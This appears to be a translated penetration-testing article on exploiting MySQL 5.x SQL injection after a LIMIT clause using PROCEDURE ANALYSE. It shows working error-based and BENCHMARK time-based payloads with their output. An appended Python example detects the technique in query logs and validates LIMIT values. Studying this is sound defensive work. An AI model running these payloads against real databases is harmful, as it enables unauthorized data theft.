There are many articles describing ways to exploit SQL injection; this article describes one special scenario.
Details
In a test, I ran into a SQL injection problem for which no solution exists on the Internet: the injection point sits after the LIMIT keyword, the database is MySQL 5.x, and the SQL statement looks like the following:
SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT "injection point"
The crux of the problem is the ORDER BY keyword in the statement. In MySQL, UNION can only be placed before ORDER BY, so when no ORDER BY precedes the injection point the UNION keyword can be used without trouble; here, however, an ORDER BY does precede the injection point. This case has been discussed on both StackOverflow and sla.ckers, but without an effective solution.
Let's take a look at the syntax of select in the MySQL 5.x documentation:
SELECT
    [ALL | DISTINCT | DISTINCTROW]
    [HIGH_PRIORITY] [STRAIGHT_JOIN]
    [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]
    [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]
    select_expr [, select_expr ...]
    [FROM table_references
    [WHERE where_condition]
    [GROUP BY {col_name | expr | position} [ASC | DESC], ... [WITH ROLLUP]]
    [HAVING where_condition]
    [ORDER BY {col_name | expr | position} [ASC | DESC], ...]
    [LIMIT {[offset,] row_count | row_count OFFSET offset}]
    [PROCEDURE procedure_name(argument_list)]
    [INTO OUTFILE 'file_name' export_options
      | INTO DUMPFILE 'file_name'
      | INTO var_name [, var_name]]
    [FOR UPDATE | LOCK IN SHARE MODE]]
The LIMIT keyword is followed by the PROCEDURE and INTO keywords. INTO can be used to write files, but that is not the topic of this article; the focus here is the PROCEDURE keyword. The only procedure available in a default MySQL installation is ANALYSE (DOC).
Try using this procedure:
mysql> select field from table where ID > 0 ORDER BY ID LIMIT 1,1 PROCEDURE analyse();
ERROR 1386 (HY000): Can't use ORDER clause with this procedure
ANALYSE accepts two parameters, so try passing two:
mysql> select field from table where ID > 0 order by ID LIMIT 1,1 procedure analyse(1,1);
ERROR 1386 (HY000): Can't use ORDER clause with this procedure
Still invalid. Next, try placing a SELECT statement inside analyse():
mysql> select field from table where ID > 0 ORDER BY ID LIMIT 1,1 procedure analyse((SELECT IF(MID(version(),1,1) LIKE 5, SLEEP(5), 1)),1);
The response is as follows:
ERROR 1108 (HY000): Incorrect parameters to procedure 'analyse'
It turns out that SLEEP() was never executed. Eventually I tried the following payload:
mysql> SELECT field FROM user WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,version())),1);
ERROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1'
Aha, the method above is the familiar error-based injection, so if the injection point returns database errors to the client, everything works. If it does not return errors, time-based injection can be used instead, with the following payload:
SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((SELECT extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)), 1))))),1)
Interestingly, SLEEP() cannot be used here; only BENCHMARK() works.
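Both sides of this scenario from a defender's seat, as an added Python example that is not part of the original article: a general-query-log check that flags a LIMIT clause followed by PROCEDURE ANALYSE(, run over constructed sample lines, and a hardened LIMIT builder that only ever interpolates bounded integers. The function names and the log lines are assumptions.

```python
import re

# Constructed sample lines in the shape of the MySQL general query log (not real traffic).
SAMPLE_LOG = """\
2024-01-01T10:00:01 12 Query SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1
2024-01-01T10:00:02 12 Query SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(EXTRACTVALUE(RAND(),CONCAT(0x3a,VERSION())),1)
2024-01-01T10:00:03 13 Query SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE((SELECT EXTRACTVALUE(RAND(),CONCAT(0x3a,(IF(MID(VERSION(),1,1) LIKE 5,BENCHMARK(5000000,SHA1(1)),1))))),1)
2024-01-01T10:00:04 14 Query SELECT COUNT(*) FROM table
"""

# PROCEDURE ANALYSE( directly after a LIMIT clause is the fingerprint of the technique
# above; legitimate application code has no reason to emit it. Case-insensitive and
# tolerant of whitespace and of both "row_count" and "offset,row_count" forms.
ANALYSE_AFTER_LIMIT = re.compile(
    r"\bLIMIT\s+\d+(?:\s*,\s*\d+)?\s+PROCEDURE\s+ANALYSE\s*\(", re.IGNORECASE)

# One general-log line: <timestamp> <connection id> Query <statement>
LOG_LINE = re.compile(r"\S+\s+(\d+)\s+Query\s+(.*)$")


def flag_limit_procedure_injection(log_text):
    """Return (connection id, statement) for every query matching the fingerprint."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if m and ANALYSE_AFTER_LIMIT.search(m.group(2)):
            hits.append((int(m.group(1)), m.group(2)))
    return hits


def build_limit_clause(offset, row_count, max_rows=100):
    """Hardened builder: request-supplied values become bounded integers or are rejected.

    Anything that is not an integer (e.g. "1,1 PROCEDURE ANALYSE(") raises ValueError
    before it can reach the statement string.
    """
    try:
        offset, row_count = int(offset), int(row_count)
    except (TypeError, ValueError):
        raise ValueError("LIMIT values must be integers")
    if offset < 0 or not 1 <= row_count <= max_rows:
        raise ValueError("LIMIT values out of range")
    return "LIMIT %d,%d" % (offset, row_count)


def limit_accepted(offset, row_count):
    """True if build_limit_clause would accept the pair; used for policy checks."""
    try:
        build_limit_clause(offset, row_count)
        return True
    except ValueError:
        return False


def paged_query(offset, row_count):
    """The article's query shape with the LIMIT clause built only from validated integers."""
    return "SELECT field FROM table WHERE id > 0 ORDER BY id " + build_limit_clause(offset, row_count)
```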
How MySQL injection points are used after the Limit keyword